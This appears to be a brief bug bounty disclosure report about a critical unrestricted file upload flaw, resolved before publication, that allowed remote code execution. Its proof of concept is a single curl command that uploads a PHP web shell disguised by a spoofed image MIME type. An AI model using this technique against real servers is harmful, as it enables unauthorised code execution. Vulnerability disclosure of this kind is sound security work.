File Upload Private Program 2024-07-01
Unrestricted File Upload to RCE
Severity: Critical | Status: Resolved
Summary
The file upload accepted .php files by only checking MIME type, which was easily spoofed.
Proof of Concept
curl -X POST -F "file=@shell.php;type=image/png" https://target.com/upload
# Uploaded to /uploads/shell.phpImpact
Remote code execution on the web server.
Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.